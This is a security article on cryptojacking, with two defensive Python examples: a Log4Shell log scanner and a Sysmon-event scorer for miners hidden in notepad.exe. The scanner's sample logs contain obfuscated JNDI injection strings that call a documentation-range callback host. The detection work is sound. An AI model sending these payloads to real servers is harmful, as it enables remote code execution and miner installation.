Cryptojacking on the Rise

Skittish ransomware gangs looking for easier paydays help drive the recent uptick in illegal cryptocurrency mining.

Despite a precipitous drop in cryptocurrency values over the past several months, cryptojacking remains a growth industry for malicious actors. Cybersecurity analysts believe some of that growth is being driven by ransomware gangs seeking less-risky revenue streams.

Global cryptojacking volume rose by 30 percent in the first half of 2022, while ransomware attacks have trended downward, according to the 2022 SonicWall Cyber Threat Report. The security firm suggests that increased international law enforcement efforts, including the arrests of several members of the notorious REvil gang, have ransomware gangs looking for an easier payday.

“Unlike ransomware, which announces its presence and relies heavily on communication with victims, cryptojacking can succeed without the victim ever being aware of it,” the SonicWall analysts wrote. “And for some cybercriminals feeling the heat, the lower risk is worth sacrificing a potentially higher payday.”

Easy Pickings

Cryptojacking is the unauthorized use of a computer, mobile device or server to mine cryptocurrency. Attackers typically get a miner onto an endpoint through a phishing email that tricks the user into clicking a malicious link, which downloads and launches the cryptomining code. On servers they more often exploit an unpatched, internet-facing service and install the miner directly.

From the criminal's perspective, it is a lot easier than ransomware. With cryptojacking there is no need to strongarm victims into paying a ransom: every infected machine pays out continuously for as long as the miner runs. Cryptojacking is also harder to detect and trace, and victims are less likely to report incidents. It requires very little technical skill, too; cryptojacking kits are sold on the dark web for as little as $30.

In fact, crypto miners are now the most common malware threat, with more than 150,000 detected during 2021. Separately, in a July public service announcement the Federal Bureau of Investigation said it had identified 244 victims of fraudulent cryptocurrency investment apps, with estimated losses of $42.7 million since the beginning of the year. That is investment fraud rather than cryptojacking, but it shows how much criminal activity now clusters around cryptocurrency.

Another factor contributing to the increase in cryptojacking is the Log4j vulnerability (Log4Shell, CVE-2021-44228). Within days of its public disclosure on Dec. 9, 2021, security firms observed hundreds of thousands of exploitation attempts, many of them trying to drop coin-miner malware onto vulnerable servers inside corporate networks. Worse yet, analysts report that cryptojacking payloads increasingly come bundled with additional malware designed to exfiltrate data from compromised systems.
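
Spotting a Log4Shell injection attempt in web-server logs is harder than grepping for "${jndi:" because attackers nest Log4j lookups to split that string apart. The following Python is an added example, not code from this article or from any vendor it cites. It runs over a few constructed access-log lines (documentation IP ranges, not real infrastructure), collapses the `${lower:..}`, `${upper:..}` and `${..:-x}` lookup forms the way Log4j would before resolving them, and reports the JNDI callback target so the line can later be correlated with outbound connections from the Java process.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format). The addresses
# are from documentation ranges; nothing here is real attacker infrastructure.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:03:12:44 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.99:1389/a}"
198.51.100.7 - - [10/Dec/2021:03:13:01 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Dec/2021:03:13:09 +0000] "GET /?q=%24%7B%24%7Blower%3Aj%7Dndi%3A%24%7Blower%3Al%7D%24%7Blower%3Ad%7Dap%3A%2F%2F203.0.113.99%3A1389%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"
203.0.113.5 - - [10/Dec/2021:03:14:20 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.99:1099/x}"
"""

# Lookup forms attackers use to keep the literal "${jndi:" out of the request:
#   ${lower:x} / ${upper:x}      -> x   (case converters)
#   ${::-x}, ${env:NOPE:-x}      -> x   (default value of a failed lookup)
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# Once normalised, the payload always reduces to ${jndi:<scheme>://<host:port>/...
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/\s}]+)", re.IGNORECASE)


def normalize(s: str, max_rounds: int = 10) -> str:
    """URL-decode, then collapse nested lookups from the inside out until stable."""
    s = unquote(s)
    for _ in range(max_rounds):
        collapsed = CASE_LOOKUP.sub(lambda m: m.group(1), s)
        collapsed = DEFAULT_LOOKUP.sub(lambda m: m.group(1), collapsed)
        if collapsed == s:
            break
        s = collapsed
    return s


def scan_log(text: str) -> list:
    """Return one dict per log line that carries a JNDI lookup after normalisation."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        normalized = normalize(line)
        match = JNDI.search(normalized)
        if match:
            hits.append({
                "line": number,
                "scheme": match.group(1).lower(),
                "target": match.group(2),   # the attacker's callback host:port
                "normalized": normalized,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['scheme']} callback to {hit['target']}")
```

The callback target is the useful artifact: a Java process that subsequently connects to that host and port has very likely fetched and run the second stage, which in the campaigns described above was usually a coin miner.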

New Techniques

Meanwhile, Microsoft reports that Microsoft Defender Antivirus detects cryptomining malware on hundreds of thousands of Windows endpoints every month. The company warns that these threats are becoming increasingly complex and evasive and use a variety of techniques to get onto a device. The three most common approaches are:

  • Executable: These attacks typically leverage phishing or other social engineering techniques to implant malicious applications or executable files on unsuspecting users’ devices. The malware then uses system resources to mine cryptocurrencies.
  • Browser-based: These miners are injected into legitimate websites, consuming resources through a user’s web browser for as long as the browser is open to that site.
  • Fileless: These stealthy miners run entirely in memory. Instead of dropping their own executable, they load, execute and persist through legitimate, signed utilities already on the system, the so-called “living-off-the-land binaries” (LOLBins), so that disk-based scanning finds nothing to flag. LOLBins are legitimate utilities, libraries and other tools that are native to a given computing environment.

Microsoft reports that many of the cryptojacking threats it monitors use the fileless approach, and that 85 percent of the fileless attacks it observed abuse Notepad, the text editor present on every Windows machine: the miner injects its code into a running notepad.exe process, so the mining CPU load is attributed to a trusted Windows binary. Because Notepad is always available, neither users nor many tools think twice about seeing it in a list of running processes.

Because a fileless miner writes no executable to disk and neither damages the device nor touches the user's data, cryptojacking is extremely hard to detect on the endpoint alone. Users might notice performance degradation, but it typically is not severe. The more reliable tells are sustained CPU use by a process that should be idle and outbound network connections from processes that have no business making them.
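
Those tells can be turned into a detection without any signature for the miner itself. The Python below is an added example written for this article, not Microsoft's detection logic. It scores constructed Sysmon-style events (Sysmon's real field names, but invented telemetry) per process: a binary such as notepad.exe opening an outbound connection is a strong signal on its own, while a scripting host spawning it, a DNS query for a pool-like name and a connection to a port commonly used by Stratum mining pools are weak signals that only add up. The port list, name hints, weights and threshold are the example's own assumptions and should be tuned to the environment.

```python
from collections import defaultdict

# Ports commonly used by Stratum mining pools (assumption; a port alone is a weak signal).
MINING_POOL_PORTS = {3333, 4444, 5555, 7777, 8888, 14444, 14433, 45700}
POOL_NAME_HINTS = ("pool", "xmr", "monero", "mining", "hashvault", "nanopool")
# Windows binaries that never need an outbound socket; a connection from one
# means something else is running inside its process.
NO_NETWORK_BINARIES = {"notepad.exe", "calc.exe", "mspaint.exe", "write.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
ALERT_THRESHOLD = 3

# Constructed Sysmon-style events using Sysmon's own field names
# (EventID 1 = ProcessCreate, 3 = NetworkConnect, 22 = DnsQuery). Not real telemetry.
EVENTS = [
    {"EventID": 1, "ProcessId": 4120, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": r"notepad.exe C:\Users\a\notes.txt"},
    {"EventID": 1, "ProcessId": 5288, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "notepad.exe"},
    {"EventID": 22, "ProcessId": 5288, "Image": r"C:\Windows\System32\notepad.exe",
     "QueryName": "xmr-pool.example"},
    {"EventID": 3, "ProcessId": 5288, "Image": r"C:\Windows\System32\notepad.exe",
     "DestinationIp": "203.0.113.40", "DestinationPort": 14444, "Protocol": "tcp"},
    {"EventID": 3, "ProcessId": 7016, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationIp": "198.51.100.20", "DestinationPort": 443, "Protocol": "tcp"},
]


def image_name(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def score_events(events: list) -> dict:
    """Accumulate weighted findings per process id.

    Only processes with at least one finding appear in the result, as
    {pid: {"score": int, "reasons": [str, ...]}}.
    """
    report = defaultdict(lambda: {"score": 0, "reasons": []})

    def add(pid, weight, reason):
        report[pid]["score"] += weight
        report[pid]["reasons"].append(reason)

    for e in events:
        pid, image = e["ProcessId"], image_name(e["Image"])
        if e["EventID"] == 1:
            parent = image_name(e["ParentImage"])
            if image in NO_NETWORK_BINARIES and parent in SCRIPT_HOSTS:
                add(pid, 1, f"{image} spawned by {parent} (typical injection target)")
        elif e["EventID"] == 3:
            if image in NO_NETWORK_BINARIES:
                add(pid, 3, f"{image} opened an outbound {e['Protocol']} connection to {e['DestinationIp']}")
            if e["DestinationPort"] in MINING_POOL_PORTS:
                add(pid, 1, f"destination port {e['DestinationPort']} is common for mining pools")
        elif e["EventID"] == 22:
            name = e["QueryName"].lower()
            if any(hint in name for hint in POOL_NAME_HINTS):
                add(pid, 1, f"DNS query for pool-like name {e['QueryName']}")
    return dict(report)


def alerts(events: list) -> list:
    """Process ids whose combined score reaches the threshold, lowest pid first."""
    return sorted(pid for pid, r in score_events(events).items() if r["score"] >= ALERT_THRESHOLD)


if __name__ == "__main__":
    for pid, r in score_events(EVENTS).items():
        print(f"pid {pid}: score {r['score']}")
        for reason in r["reasons"]:
            print(f"  - {reason}")
    print("alert on:", alerts(EVENTS))
```

In the sample, the notepad.exe started by explorer.exe with a file argument never scores, while the one spawned by PowerShell with no file, querying a pool-like name and connecting to port 14444, crosses the threshold on the network connection alone; the weak signals just make the triage note more convincing. The same logic ports directly to a SIEM query or a Sigma rule once Sysmon events are being collected.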

Nevertheless, the impact of cryptojacking is significant. Beyond lost user productivity, an always-running miner keeps the CPU at full load, which overheats devices, shortens battery life and stresses other system components. Organizations can end up spending considerable time, money and staff effort investigating performance problems and even replacing hardware in an attempt to resolve the issue.

Identify and Block Threats

User education is one of the keys to reducing the risk of cryptojacking. Employees should understand what it is, how it spreads and the damage it can do. Because a device can be exposed simply by visiting a legitimate website into which a miner has been injected, organizations should also consider anti-cryptojacking browser extensions such as No Coin and MinerBlock, which block known mining scripts and domains before the browser runs them.

Intel's Threat Detection Technology (TDT) is an effective hardware-assisted way of exposing hidden miners. TDT feeds telemetry from the CPU's performance monitoring unit into machine-learning heuristics that recognize the execution fingerprint of cryptomining code, regardless of which process it is hiding in or whether it was ever written to disk. The analysis is offloaded to the integrated graphics processor, so the overhead on the system is minimal. When a threat is detected, TDT sends a high-fidelity signal that triggers remediation workflows in endpoint detection and response tools; Microsoft Defender for Endpoint, for example, consumes the TDT signal to identify and block cryptojacking on supported Intel hardware.

Cryptojacking is a growing threat that can sap system performance and even damage equipment. It is also increasingly bundled with other malware that exfiltrates data. Organizations should take steps to detect and block this insidious threat.
